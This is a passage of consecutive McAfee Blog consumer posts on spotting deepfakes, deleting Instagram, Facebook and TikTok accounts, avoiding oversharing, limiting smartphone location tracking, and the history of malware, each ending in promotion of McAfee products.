Look for repetition. AI chatbots get trained on volumes and volumes of text. As such, they often latch onto pet terms and phrases that they learned as they were trained. Stylistically, AI chatbots often overlook that repetition.

Look for style (or lack thereof). Today’s chatbots are no Ernest Hemingway, Mark Twain, or Vladimir Nabokov. They lack style. The text they generate often feels canned and flat. Moreover, they tend to spit out statements, yet with little consideration for how they flow together.

How to spot deepfake photos.

Zoom in. A close look at deepfake photos often reveals inconsistencies and flat-out oddities. Consider this viral picture of the “Puffer Pope” that circulated recently. Several things point toward a bogus image.

How to spot deepfake audio and video.

Keep an eye on the speaker. A close look at who’s doing the talking in a deepfake video can reveal if it’s a fake. Subtle things reveal themselves. Is the speaker blinking too much? Too little? At all? How about their speech. Does it sync up with their mouth perfectly? These might be signs of a deepfake.

Watch how the speaker moves. In the example of the Ukrainian presidential deepfake, it appears that only President Zelensky’s head moves. Just slightly. This is a sign of lower-grade video deepfake technology. It has difficulty tracking movement. Another possible sign is if the speaker never moves their hand across their face. Once again, that might indicate the work of lesser AI tools. In that case, they render the facial image on the hand.

How does the speaker sound? In the case of audio-only deepfakes, today’s AI tools work best when they’re fed smaller chunks of text to create speech. They don’t work as well with big blocks. This requires creators to stitch those chunks together. As a result, the cadence and flow might sound on the copy side. Also, you might not hear the speaker taking breaths, as normal speakers do.

Be skeptical. Always.

With AI tools improving so quickly, we can no longer take things at face value. Malicious deepfakes look to deceive, defraud, and disinform. And the people who create them hope you’ll consume their content in one, unthinking gulp. Scrutiny is key today. Fact-checking is a must, particularly as deepfakes look sharper and sharper as the technology evolves.

Plenty of deepfakes can lure you into sketchy corners of the internet. Places where malware and phishing sites take root. Consider using comprehensive online protection software with McAfee+ to keep safe. In addition to several features that protect your devices, privacy, and identity, they can warn you of unsafe sites too. While it might not sniff out AI content (yet), it offers strong protection against bad actors who might use fake news to steal your info or harm your data and devices.

[i] https://www.pewresearch.org/journalism/fact-sheet/social-media-and-news-fact-sheet

The post How to Spot a Deepfake on Social Media appeared first on McAfee Blog.

Thinking about deleting your Instagram account? We can show you how.

Before we get to that, you might be interested to find what kind of data Instagram collects about you — and how long Instagram keeps your account data, even after you delete it.

What does Facebook know about you?

For that answer, we turn to Instagram’s privacy policy page.[i] As you might imagine, the list of what they collect is long — long enough that you’ll want to read it for yourself. Yet, broadly, Instagram provides the following summary as part of its June 2024 Privacy Policy.

Per Instagram they collect:

• Your activity and information you provide.
• Friends, followers, and other connections.
• App, browser, and device information.
• Information from partners, vendors, and other third parties.

The last bullet is an important one. Instagram very likely knows about things you do even when you’re not using Instagram. How do they get a hold of that info? Per Instagram, third parties use a mix of “Business Tools,” integrations, and Meta Audience Network technologies to share info.

So, what are these “Business Tools?” Per Instagram, they’re technologies used by website owners and publishers, app developers, and business partners, including advertisers and others. These technologies integrate and share data with Meta (Instagram’s parent company) to understand and measure their products and services. They also help them better reach and serve people who use or might be interested in their products and services.

Also per Instagram, here are examples of info they might receive this way:

• Your device information.
• Websites you visit and cookie data, like through Social Plugins or the Meta Pixel.
• Apps you use.
• Games you play.
• Purchases and transactions you make off of our Products using non-Meta checkout experiences.
• Your demographics, like your education level.
• The ads you see and how you interact with them.
• How you use our partners’ products and services, online or in person.

Everyone has their own appetite for privacy, and we’ve all known for some time that with using a “free” social media platform comes a price — privacy to some extent or other. The more you know how much a platform knows about you, the better decision you can make about participating on it.

How long does Instagram keep your data?

As for how long they keep all that data and info they collect, the answer varies. Per Instagram, “We keep information as long as we need it to provide our Products, comply with legal obligations or protect our or other’s interests. We decide how long we need information on a case-by-case basis.”

Also per Instagram, here’s what they consider when they keep data info:

• If we need it to operate or provide our Products. For example, we need to keep some of your information to maintain your account.
• The feature we use it for, and how that feature works. For example, messages sent using Messenger’s vanish mode are retained for less time than regular messages.
• How long we need to retain the information to comply with certain legal obligations.
• If we need it for other legitimate purposes, such as to prevent harm; investigate possible violations of our terms or policies; promote safety, security and integrity; or protect ourselves, including our rights, property or products.

In short, deleting your Instagram account is no guarantee that your data will immediately get deleted along with it. Per the list above, Instagram’s Privacy Policy allows the platform to keep your data for an indeterminate amount of time.

How to delete your Instagram account

Per Instagram’s policy, your access to your account and info will be permanently removed 30 days after your request. However, according to Instagram, it may take up to 90 days to complete the deletion process after it begins. Copies of your content may remain after the 90 days in backup storage that Instagram uses to recover in case of a disaster, software error, or other data loss event.

Now, onto the steps for deleting your Instagram account.

From your computer:

1. Click More in the bottom left, then click Settings .
2. Click Accounts Center, then click Personal details.
3. Click Account ownership and control, then click Deactivation or deletion.
4. Click the account you’d like to permanently delete.
5. Click Delete account, then click Continue.

From your Android device:

1. Tap  or your profile picture in the bottom right to go to your profile.
2. Tap  in the top right.
3. Tap Accounts Center, then tap Personal details.
4. Tap Account ownership and control, then tap Deactivation or deletion.
5. Tap the account you’d like to permanently delete.
6. Tap Delete account, then tap Continue.

From your iOS device:

1. Tap  or your profile picture in the bottom right to go to your profile.
2. Tap   in the top right.
3. Tap Accounts Center, then tap Personal details.
4. Tap Account ownership and control, then tap Deactivation or deletion.
5. Tap the account you’d like to permanently delete.
6. Tap Delete account, then tap Continue.

We suggest one more step in addition to the ones above.

Remove your info from the data broker sites that sell it.

Here’s why you might want to do that … Given the way social media companies share info with third parties, there’s a chance your personal info might have made it onto one or several data broker sites. These sites buy and sell extensive lists of personal to anyone, which ranges anywhere from advertisers to spammers and scammers. 

If the thought of your personal info being bought and sold puts you off, there’s something you can do about it. Our Personal Data Cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites, and with select products, it can even manage the removal for you. ​

[i] https://privacycenter.instagram.com/policy/

The post How to Delete Your Instagram Account appeared first on McAfee Blog.

Thinking about deleting your Facebook account? We can show you how.

Before we get to that, you might be interested to find what kind of data Facebook collects about you — and how long Facebook keeps your account data, even after you delete it.

What does Facebook know about you?

For that answer, we turn to Facebook’s privacy policy page.[i] As you might imagine, the list of what they collect is long—long enough that you’ll want to read it for yourself. Yet, broadly, Facebook provides the following summary as part of its June 2024 Privacy Policy.

Per Facebook, they collect:

• The information you give us when you sign up for our Products and create a profile, like your email address or phone number.
• What you do on our Products. This includes what you click on or like, your posts, photos, and messages you send. If you use end-to-end encrypted messaging, we can’t read those messages unless users report them to us for review.
• Who your friends or followers are, and what they do on our Products.
• Information from the phone, computer, or tablet you use our Products on, like what kind it is and what version of our app you’re using.
• Information from partners about things you do both on and off of our Products. This could include other websites you visit, apps you use, or online games you play.

The last bullet is an important one. Facebook very likely knows about things you do even when you’re not using Facebook.

How do they know about that? Increasingly, that comes through a technology called “server-side tracking.” It’s a form of ad and behavior tracking where a company’s servers communicate directly with each other. In this case, that’s a company’s servers and Facebook’s servers. It can track custom events like page visits, purchases, and the like. This way, companies can track the performance of their Facebook campaigns. It’s like using tracking cookies, with one important difference — it bypasses the user’s device. (Cookies rely on data stored on your device.) The process is invisible to the user.

How extensive is its use? A recent study by Consumer Reports of more than 700 Facebook users found that the average user was tracked by more than 2,200 companies partly using this technology.[ii] Consumer Reports was quick to state that their findings don’t reflect a representative sample because participants were volunteers, and the results weren’t adjusted for demographics. Yet it is telling that across these 700-plus Facebook users, roughly 7,000 different companies shared their data with Facebook.

Everyone has their own appetite for privacy, and we’ve all known for some time that with using a “free” social media platform comes a price — privacy to some extent or other. The more you know how much a platform knows about you, the better decision you can make about participating in it.

How long does Facebook keep your data?

As for how long they keep all that data and info they collect, the answer varies. Per Facebook,

• Your information, including financial transaction data related to purchases or money transfers made on our Products, may be preserved and accessed for a longer time period if it’s related to any of the following:
• A legal request or obligation, including obligations of Meta Companies or to comply with applicable law.
• A governmental investigation.
• An investigation of possible violations of our terms or policies.
• To prevent harm.
• For safety, security, and integrity purposes.
• To protect ourselves, including our rights, property, or products.
• If it’s needed in relation to a legal claim, complaint, litigation, or regulatory proceedings.
• In some cases, we may preserve your information based on the above reasons even after you request deletion of your account or some of your content. We may also preserve information from accounts that have been disabled and content that has been removed for violations of our terms and policies.

In short, deleting your Facebook account is no guarantee that your data will immediately get deleted along with it. Per the list above, Facebook’s Privacy Policy allows the platform to keep your data for an indeterminate amount of time.

Now, onto the steps for deleting your Facebook account.

How to delete your Facebook account

Before you permanently delete your account, keep a few things in mind. Per Facebook:

• You won’t be able to reactivate your account.
• Your profile, photos, posts, videos, and everything else you’ve added will be permanently deleted. You won’t be able to retrieve anything you’ve added.
• You’ll no longer be able to use Facebook Messenger.
• You won’t be able to use Facebook Login for other apps you may have signed up for with your Facebook account, like Spotify or Pinterest. You may need to contact the apps and websites to recover those accounts.
• Some information, like messages you sent to friends, may still be visible to them after you delete your account. Copies of messages you have sent are stored in your friends’ inboxes.

Note that Facebook provides a 30-day grace period once you delete your account. If you want to hop back onto the platform, you can simply reactivate your account during that period. All your info, data, and posts will be there. After those 30 days, you’ll no longer have access to them.

As for the steps, that varies. If you’re deleting Facebook from a computer:

1. Click your profile picture in the top right of Facebook.
2. Select Settings & privacy, then click Settings.
3. If Accounts Center is at the top left of your Settings menu, you can delete your account through Accounts Center. If Accounts Center is at the bottom left of your Settings menu, you can delete your account through your Facebook Settings.

If you’re deleting Facebook from an iOS device:

1. From your main profile, tap  in the bottom right of Facebook.
2. Scroll down and tap Settings & privacy
3. If Accounts Center is at the top of your Settings & privacy menu, you can delete your account through Accounts Center. If Accounts Center is at the bottom of your Settings & privacy menu, you can delete your account through your Facebook Settings.

And from an Android device:

1. Tap  in the top right of Facebook.
2. Scroll down and tap Settings & privacy
3. If Accounts Center is at the top of your Settings & privacy menu, you can delete your account through Accounts Center. If Accounts Center is at the bottom of your Settings & privacy menu, you can delete your account through your Facebook Settings.

We suggest one more step in addition to the ones above.

Remove your info from the data broker sites that sell it.

Here’s why you might want to do that … Given the way social media companies share info with third parties, there’s a chance your personal info might have made it onto one or several data broker sites. These sites buy and sell extensive lists of personal to anyone, which ranges anywhere from advertisers to spammers and scammers. 

If the thought of your personal info being bought and sold puts you off, there’s something you can do about it. Our Personal Data Cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites, and with select products, it can even manage the removal for you. ​

[i] https://www.facebook.com/privacy/policy/?entry_point=data_policy_redirect&entry=0

[ii] https://www.consumerreports.org/electronics/privacy/each-facebook-user-is-monitored-by-thousands-of-companies-a5824207467/

The post How to Delete Your Facebook Account appeared first on McAfee Blog.

Thinking about deleting your TikTok account? We can show you how.

Before we get to that, you might be interested to find what kind of data TikTok collects about you — and how long TikTok keeps your account data, even after you delete it.

What does TikTok know about you?

For that, we turn to TikTok’s privacy policy page.[i] TikTok collects data just like practically any other social media platform, and the list of what they collect runs long. You can see a full list in their privacy policy, yet here are a few things you might want to know about. Per TikTok:

• User-generated content, including comments, photographs, live streams, audio recordings, videos, text, hashtags, and virtual item videos that you choose to create with or upload to the Platform (“User Content”) and the associated metadata, such as when, where, and by whom the content was created. Even if you are not a user, information about you may appear in User Content created or published by users on the Platform.
• Messages, which include information you provide when you compose, send, or receive messages through the Platform’s messaging functionalities. They include messages you send through our chat functionality when communicating with sellers who sell goods to you, and your use of virtual assistants when purchasing items through the Platform. That information includes the content of the message and information about the message, such as when it was sent, received, or read, and message participants.
• Purchase information, including payment card numbers or other third-party payment information (such as PayPal) where required for the purpose of payment, and billing and shipping address. We also collect information that is required for extended warranty purposes and your transaction and purchase history on or through the Platform.
• TikTok may also collect or receive information about you from organizations, businesses, people, and others, including, for example, publicly available sources, government authorities, professional organizations, and charity groups.
• Advertisers, measurement, and other partners share information with us about you and the actions you have taken outside of the Platform, such as your activities on other websites and apps or in stores, including the products or services you purchased, online or in person. These partners also share information with us, such as mobile identifiers for advertising, hashed email addresses and phone numbers, and cookie identifiers, which we use to help match you and your actions outside of the Platform with your TikTok account.

So, TikTok knows the content you create, the content you appear in, and the messages you send (and the specific contents of those messages) — and potentially payment info and the people in your phone contacts. Additionally, it collects info on you from other sources and on any purchases you might have made through the platform.

What other data does TikTok collect?

The list continues. Once again, you can visit their privacy policy page for more details, yet here’s a partial rundown of other data they collect about you automatically. Per TikTok:

• Location Data. We collect information about your approximate location, including location information based on your SIM card and/or IP address. In addition, we collect location information (such as tourist attractions, shops, or other points of interest) if you choose to add the location information to your User Content. Current versions of the app do not collect precise or approximate GPS information from U.S. users.
• Image and Audio Information. We may collect information about the videos, images, and audio that are a part of your User Content, such as identifying the objects and scenery that appear, the existence and location within an image of face and body features and attributes, the nature of the audio, and the text of the words spoken in your User Content.
• Metadata. When you upload or create User Content, you automatically upload certain metadata that is connected to the User Content. Metadata describes other data and provides information about your User Content that will not always be evident to the viewer. For example, in connection with your User Content, the metadata can describe how, when, where, and by whom the piece of User Content was created, collected, or modified and how that content is formatted. It also includes information, such as your account name, which enables other users to trace back the User Content to your user account.

How long does TikTok keep your data?

As for how long they keep all that data and info they collect, the answer is unclear. Per TikTok,

“We retain information for as long as necessary to provide the Platform and for the other purposes set out in this Privacy Policy. We also retain information when necessary to comply with contractual and legal obligations, when we have a legitimate business interest to do so (such as improving and developing the Platform and enhancing its safety, security, and stability), and for the exercise or defense of legal claims.” [ii]

The key phrases here are “as long as necessary” and “when necessary.” TikTok doesn’t set a specific period in its policy. In fact, TikTok goes on to say that the periods vary based on “different criteria, such as the type of information and the purposes for which we use the information.”

Now, onto the steps for deleting your TikTok account.

How to delete your TikTok account

1. In the TikTok app, tap Profile at the bottom.
2. Tap the Menu ☰ button at the top.
3. Tap Settings and Privacy.
4. Tap Account, then tap Deactivate or delete account, and follow the instructions to delete your account.
5. Note that at this point you have the option to download your data (like your video posts), because you won’t have access to them once you delete your account. Make sure you download your data before you select Delete.

Note that TikTok provides a 30-day grace period once you delete your account. If you want to hop back onto the platform, you can simply reactivate your account during that period. All your info, data, and posts will be there. After those 30 days, you’ll no longer have access to them.

We suggest one more step in addition to the ones above.

6. Remove your info from the data broker sites that sell it.

Here’s why you might want to do that … Given the way social media companies share info with third parties, there’s a chance your personal info might have made it onto one or several data broker sites. These sites buy and sell extensive lists of personal to anyone, which ranges anywhere from advertisers to spammers and scammers. 

If the thought of your personal info being bought and sold puts you off, there’s something you can do about it. Our Personal Data Cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites, and with select products, it can even manage the removal for you. ​

[i] https://www.tiktok.com/legal/page/row/privacy-policy/en

[ii] https://www.tiktok.com/legal/page/row/privacy-policy/en

The post How to Delete Your TikTok Account appeared first on McAfee Blog.

What is oversharing on social media? And how do you avoid it?

Oversharing on social media takes on a couple different aspects. There’s one that’s personal, like what you share and how often you share it. Another revolves around your privacy and your security. Namely, how does what you share and how often you share it affect your privacy — and what further effect does that have on your security? Does it open you up to scams, identity theft, and other forms of cybercrime?

A grasp on that can help you avoid oversharing and post on social media in a way that’s “just right.”

Granted, it might seem a little odd to talk about privacy and the like on social media, which is, by definition, social in nature. The idea, though, is striking a balance — getting all the benefits of connection and keeping up with people and groups that matter to you in a way that’s enjoyable and safe. And healthy too.

Let’s start with a look at what oversharing looks like and its possible effects. From there, we can check out some specific ways you can avoid oversharing on social media.

The personal aspect of oversharing

For starters, oversharing usually conjures up the notion of T.M.I., or “too much information.” That might involve posting too often, yet it can also involve sharing too many personal details. Along those lines, a long-standing definition of oversharing goes like this:

“The excessive generosity with information about one’s private life or the private lives of others.”[i]

Of course, “excessive” is a relative term. Different people have different boundaries when it comes to what’s personal. Likewise, the people reading a post have different ideas of what counts as sharing “too much” and what doesn’t.

Further complicating the matter is how many people choose to have multiple accounts on the same platform.

In particular, teens and younger adults often have a broader public account with many followers along with a more private account that they share with select friends. A post that might be fine, and expected, on a private account might come across as an overshare on a public account.

However, there are cases where oversharing can point to deeper issues, like anxiety, depression, and unhealthy attention-seeking behavior. So-called “sadfishing” offers one example, where people create negative posts in a bid to get sympathy. Other examples include sharing details about oneself online that a person would normally never share on a phone call or in a face-to-face conversation.

If you have concerns about yourself or someone you know, confide in someone you trust for advice. See if they have the same concerns as you do. Also, in the U.S., you can speak to speak to a licensed counselor through the “988” service, which you can learn more about at https://988lifeline.org. It’s free and confidential.

The privacy and security aspects of oversharing

When it comes to privacy and security, oversharing takes on a different meaning. Elsewhere in our blogs, we’ve talked about that issue like this:

“Saying more than you should to more people than you should.”

Now, here’s where your privacy and security come in. Consider the audience you have across your social media profiles. Perhaps you have dozens, if not hundreds of friends and followers. All with various degrees of closeness and familiarity. Post something personal on social media to that broad audience, and you indeed might end up sharing something that puts your personal privacy and security at risk. After all, if you have hundreds of followers, how many of them are people you truly know and absolutely trust?

Here are a few scenarios:

• “This is the pool at the rental home I’m staying at this week. Amazing!” Which also tells everyone, “My home is empty for the next few days.”
• “I can’t start my workday without a visit to my favorite coffee shop.” It also says, “If you ever want to track me down in person, you can find me at this location practically any weekday morning.”
• We’ve also previously shared word of the Japanese pop singer who was assaulted by a man who tracked her down through the reflection in her eyes on a selfie she posted.[ii]The alleged attacker noted a train station sign in her eyes, one she regularly used for her commute, and laid in wait for her there.

In other words, social media posts have a way of saying much more than we might think. And when shared publicly or to a large audience of friends and followers you don’t know well, that can expose you in ways you might not want.

How to avoid oversharing on social media

As with so many things online, staying safer and more private calls for a mix of technology and internet street smarts. Things like settings, privacy tools, and what you post can help you enjoy social media safely.

Be more selective with your settings.

Social media platforms like Facebook, Instagram, and others give you the choice of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting — not to mention your relationships and likes. (Think of your social media profile showing up in a Google search.) Taking a “friends only” approach to your social media profiles can help protect your privacy because that gives a possible scammer or stalker much less material to work with.

Some platforms further allow you to create sub-groups of friends and followers. With a quick review of your network, you can create a sub-group of your most trusted friends and restrict your posts to them as needed.

Stay on top of your privacy with our Social Privacy Manager.

Here’s the thing with those social media settings — they can be challenging to locate and confusing to adjust. In all, it can take time to make sure that your info and posts are only shown to people you want to see them.​ Our Social Privacy Manager can do that work for you.

Based on your preferences, it adjusts more than 100 privacy settings across your social media accounts in just a few clicks. This way, your personal info is only visible to the people you want to share it with.

Say “no” to bots and bogus accounts.

There are plenty of fake accounts out there on social media. On Facebook, the platform acted on 1.2 billion fake accounts between April and June 2024 alone.[iii] On X, formerly Twitter, the platform announced a “bot purge” in 2024. However, in May 2023, the platform suspended access to a publicly available data set that helped find and track bots on the platform. Still, researchers continue to find false accounts, particularly ones powered by AI tools.[iv]

The bottom line is this: don’t accept invites from people you don’t know. Bad actors might use them to launch scams, gather personal info on potential identity theft victims, and spread disinformation. Also, be aware that some followers might not be who they appear to be. In the immediate wake of the “bot purge” on X, many accounts saw themselves losing thousands of followers.[v]

Consider what you post.

Think about posting those vacation pictures after you get back home, so people don’t know you’re away when you’re away. Also, consider if your post pinpoints where you are or where you go regularly. Do you want people in your broader network to know that? Closely review the pics you take and see if there’s any revealing information in the background. If so, you can crop it out (think notes on a whiteboard, reflections in a window, or revealing location info). Further, ask anyone you want to include in their post for their permission. In all, consider their privacy too.

Consider what you post about others, too.

Indeed, oversharing can include what you post and say about others online as well. A good rule of thumb when posting group pictures online is to ask if the other people in them are okay with it going onto social media. Also ask yourself, “Is this my news to share?” For example, a friend leaves one job to take on a new role elsewhere. Before posting, “Congrats on the new job!” let them make that first announcement themselves.

For parents, this calls for extra consideration too. Anything you post about your child becomes a part of their permanent online record. What might seem funny or cute today might become embarrassing or even fodder for cyberbullies tomorrow.

A more private social media…

Yes, you give up some privacy by using social media. That’s the very nature of it. The trick is in sharing just enough and with just the right people.

Being careful of who you accept as a friend, keeping an eye on accounts that follow you, and paying mind to what you post and how often are all ways you can prevent oversharing. Likewise, using tools to fine-tune who sees your posts, keeping things to close friends in sub-groups or secondary accounts, and keeping your social media accounts out of the public eye are yet more steps you can take to protect yourself, your privacy, and your security on social media.

[i] https://portal.research.lu.se/en/publications/front-and-backstage-in-social-media

[ii] https://www.theguardian.com/world/2019/oct/11/japanese-assault-suspect-tracked-down-pop-star-via-eye-reflection-in-selfie

[iii] https://transparency.meta.com/reports/community-standards-enforcement/fake-accounts/facebook

[iv] https://arxiv.org/pdf/2307.16336

[v] https://www.socialmediatoday.com/news/x-formerly-twitter-bot-purge-sees-big-accounts-lose-followers/712495/

The post How to Avoid Oversharing on Social Media appeared first on McAfee Blog.

With its built-in location services, your smartphone can point you to plenty of places. To the location of your vacation rental. To the quickest route around a traffic jam. And to a tasty burger. It’s a tremendous convenience. Yet, there’s a flip side. Your smartphone also tracks your location. Getting to know how your phone tracks you and how you can limit that tracking can make you far more private online.

The basic privacy issue with location services is this: many companies use your activities and apps as a way of gathering info on you. They might collect that info for their own purposes, and they might sell that info to third parties.

As to why some companies do that, the answer typically boils down to a handful of things. They will:

• Collect user info that helps them improve their products and services.
• Gather behavioral info that then gets sold to third parties, like data brokers.
• Use your info to serve you targeted ads.

So, it’s a bit of a tradeoff. You might use an app to show you the closest Indian restaurant to your hotel — but depending on the user agreement for that app, the company behind it might collect your info for their own financial gain.

We can boil that down yet further. Sometimes what you gain in convenience you lose in privacy.

Let’s look at how smartphones track your movements and follow that up with ways you can limit that tracking.

How do smartphones track your movements?

Unless you’ve turned it off completely, your phone can track you in several ways with several degrees of accuracy:

GPS: The Global Positioning System, or GPS as many of us know it, is a system of satellites operated by the U.S. government for navigation purposes. First designed for national defense, the system became available for public use in the 1980s. It’s highly accurate, to anywhere between nine to 30 feet depending on conditions and technology used, making it one of the strongest tools for determining a phone’s location. This is what powers location services on cell phones, and thus can help an app recommend a great burger joint nearby.

Cell towers: Cell phone providers can track a phone’s location by the distance it is to various cell phone towers and by the strength of its signal. The location info this method provides is a bit coarser than GPS, providing results that can place a phone within 150 feet. It’s most accurate in urban areas with high densities of cell phone towers, although it does not always work well indoors as some buildings can weaken or block cell phone signals.

One of the most significant public benefits of this method is that it automatically routes emergency services calls (like 911 in the U.S.) to the proper local authorities without any guesswork from the caller.

Public Wi-Fi: Larger tech companies and internet providers will sometimes provide free public Wi-Fi hotspots that people can tap into at airports, restaurants, coffeehouses, and such. It’s a nice convenience, but connecting to their Wi-Fi might share a phone’s MAC address, a unique identifier for connected devices, along with other identifiers on the smartphone.

Taken together, this can allow the Wi-Fi hosting company to gather location and behavioral data while you use your phone on their Wi-Fi network.

Bluetooth: Like with public Wi-Fi, companies can use strategically placed Bluetooth devices to gather location info as well. If Bluetooth is enabled on a phone, it will periodically seek out Bluetooth-enabled devices to connect to while the phone is awake. This way, a Bluetooth receiver can then capture that phone’s unique MAC address. This provides highly accurate location info to within just a few feet because of Bluetooth’s short broadcast range.

In the past, we’ve seen retailers use this method to track customers in their physical stores to better understand their shopping habits. However, newer phones often create dummy MAC addresses when they seek out Bluetooth connections, which helps thwart this practice.

Ways to limit tracking on your smartphone

So, just to emphasize what we said above, not every app sells shares or sells your info to third parties. However, that gets into the complicated nature of user agreements. The language that covers what’s collected, for what reasons, what’s done with it, and who it’s shared with often finds itself buried in a wall of legalese.

Ultimately, it’s up to you to determine what your comfort level is in any kind of convenience in exchange for a loss of privacy. Everyone has their own comfort levels.

With that, you can take several steps to limit tracking on your smartphone to various degrees — and boost your privacy to various degrees as a result:

Turn off your phone or switch to Airplane Mode. Disconnect. Without a Wi-Fi or data connection, you can’t get tracked. While this makes you unreachable, it also makes you untraceable, which you might want to consider if you’d rather keep your whereabouts and travels to yourself for periods of time.

Turn off location services altogether. As noted above, your smartphone can get tracked by other means, yet disabling location services in your phone settings shuts down a primary avenue of location data collection. Note that your maps apps won’t offer directions and your restaurant app won’t point you toward that tasty burger when location services are off, but you’ll be more private than with them turned on.

Provide permissions on an app-by-app basis. Another option is to go into your phone settings and enable location services for specific apps in specific cases. For example, you can set your map app to enable location services only while in use. For other apps, you can disable location services entirely. Yet another option is to have the app ask for permissions each time. Note that this is a great way to discover if apps have defaulted to using location services without your knowledge when you installed them.

On an iPhone, you can find this in Settings -> Privacy & Security -> Location Services. On an Android, go to Settings -> Locations -> App Locations Permissions.

Delete old apps. And be choosy about new ones. Fewer apps mean fewer avenues of potential data collection. If you have old, unused apps, consider deleting them, along with the accounts and data associated with them.

Use a VPN. A VPN can make your time online more private and more secure by obscuring things like your IP address and by preventing snoops from monitoring your activity.

Turn off app tracking. As you’ve seen, some apps will ask to track your activity and potentially share it with data brokers and other third parties. You can halt this by turning off app tracking. On an iPhone, go to Settings -> Privacy & Security -> Tracking and disable “Allow Apps to Request to Track.” On an Android phone, go to Settings -> Privacy and Security, then turn on “Do Not Track.”

And just as you can with location services, you can set apps to make tracking requests on an app-by-app basis. You’ll see it on the same screen that has the global “Do Not Track” option.

Opt yourself out of cell phone carrier ad programs. Different cell phone carriers have different user agreements, yet some might allow the carrier to share insights about you with third parties based on browsing and usage history. Opting out of these programs might not stop your cell phone carrier from collecting data about you, but it might prevent it from sharing insights about you with others.

To see if you participate in one of these programs, log into your account portal or app. Look for settings around “relevant advertising,” “custom experience,” or even “advertising,” and then determine if these programs are of worth to you.

The post Location, Location, Location: Three Reasons It Matters for Your Smartphone appeared first on McAfee Blog.

What is malware? A dictionary-like definition is “malicious software that attacks computers, smartphones, and other connected devices.”

In fact, “malware” is a mash-up of “malicious software.” It describes any type of software or code specifically designed to exploit a connected device or network without consent. And, unsurprisingly, hackers design most of it for financial gain.

What kinds of malware are there?

Think of malware as an umbrella term that covers an entire host of “bad stuff,” such as:

Spyware that tracks activity, like what you type and where you type it. (Think snooping on your bank account logins.

Ransomware that holds devices or the data on them hostage, that hackers only release for a price. (And even so, payment is no guarantee you’ll get back your access.)

Adware that serves up spammy ads on your device. (The hacker gets paid for the number of “impressions” the ads have. The more they show up on people’s devices, the more they get paid.)

Botnet software, that hijacks a device into a remote-controlled network of other devices. (These networks are used to shut down websites or even shut down large portions of the internet, just to mention two of the things they can do.)

Rootkit that attacks that give hackers remote-control access to a device. (And with that control, they can wage all manner of attacks — on the device and on other devices too.)

Viruses that modify the way a device and its apps function. Also, they can effectively bring a device or network to a grinding halt. (Yes, viruses are a subset of malware. They can copy, delete, and steal data, among other things.)

Viruses, the original malware

You might know malware by its more commonly used name — viruses.

There’s a pretty good reason why people commonly refer to malware as a “virus.” Viruses have been on our collective minds for some time.

Viruses have a long history. You could call it “the original malware.” And depending on how you define what a virus is, the first one took root in 1971 — more than 50 years ago. It was known as Creeper, and rather than being malicious in nature, the creator designed it to show how a self-replicating program could spot other devices on a network, transfer itself to them, and find yet more devices to repeat the process. Later, the same programmer who created a refined version of Creeper developed Reaper, a program that could remove the Creeper program. In a way, Reaper could be considered the first piece of antivirus software.[i]

From there, it wasn’t until the 1980s that malware started affecting the broader population, a time when computers became more commonplace in businesses and people’s homes.

At first, malware typically spread by infected floppy disks, much like the “Brain” virus in 1986. While recognized today as the first large-scale computer virus, its authors say they never intended it to work that way. Rather, they say they created Brain as an anti-piracy measure to protect their proprietary software from theft. However, Brain got loose. It went beyond their software and affected computers worldwide. Although not malicious or destructive in nature, Brain most certainly put the industry, businesses, and consumers on notice. Computer viruses were a thing.[ii]

Another piece of malware that got passed along via floppy disks was the “PC Cyborg” attack that targeted the medical research community in and around 1989. There, the malware would lie in wait until the user rebooted their computer for the 90^th time and was presented with a digital ransom note.[iii]

An early example of ransomware – Source, Wikipedia

Upon that 90^th boot, PC Cyborg encrypted the computer’s files, which would only get unencrypted if the victim paid a fee, making it the first documented form of ransomware.

Shortly thereafter, the internet started connecting computers, which opened millions of doors for hackers as people went online. Among the most noteworthy was 1999’s “Melissa” virus, which spread by way of infected email attachments and overloaded hundreds of corporate and governmental email servers worldwide.

It was quickly followed in 2000 by what’s considered among the most damaging malware to date — ILOVEYOU, which also spread by way of an attachment, this one posing as a love letter. Specifically, it was a self-replicating worm that installed itself on the victim’s computer where it destroyed some info and stole other info, then spread to other computers. One estimate put the global cost of ILOVEYOU at $10 billion. It further speculated that it infected 10% of the world’s internet-connected computers at the time.[iv]

Antivirus, your best defense against malware

With that history, it’s no surprise that anti-malware software is commonly called “antivirus.”

Antivirus forms a major cornerstone of online protection software. It protects your devices against malware through a combination of prevention, detection, and removal. Our antivirus uses AI to detect the absolute latest threats — and has for several years now.

Today, McAfee registers more than a million new malicious programs and potentially unwanted apps (PUA) each day, which contributes to the millions and millions already in existence. Now with the arrival of AI-powered coding tools, hackers can create new strains at rates unseen before.

That’s another reason why we use AI in our antivirus software. We use AI to protect against AI-created malware. It does so in three ways:

1. It detects threats by referencing models of existing threats. This combats pre-existing threats and entirely new (zero-day) threats alike. AI can spot a variety of different threats by comparing them to features it’s seen before. For example, it’s like AI learning to identify different varieties of fruit. An apple is still an apple whether it’s a Fuji or Granny Smith. In that way, a virus is still a virus if it’s “Virus A” or the newly discovered “Virus Z.”
2. It further detects unusual events and behaviors. AI provides a particularly powerful tool against zero-day threats. It analyzes the activities of applications for patterns that are consistent with malicious behavior. With that, it can spot and prevent a previously unknown file or process from doing harm. In its way, AI says, “I’ve seen this sketchy behavior before. I’m going to flag it.”
3. It automatically classifies threats and adds them to its body of knowledge. AI-driven threat protection gets stronger over time. Because it learns. Something we call “threat intelligence.” The more threats it encounters, the more rapidly and readily it can determine if files want to do you no good. The body of threat intelligence improves immensely as a result.

Once again, it’s important to remind ourselves that today’s malware is created largely for profit. Hackers use it to gain personal and financial info, either for their own purposes or to sell it for profit. The files you have stored on your devices have a street value. That includes tax returns, financial docs, payment info, and so on. Moreover, when you consider all the important things you keep on your devices, like your photos and documents, those have value too. Should you get caught up in a ransomware attack, a hacker puts a price tag on them for their return.

Needless to say, and you likely know this already, antivirus is essential for you and your devices.

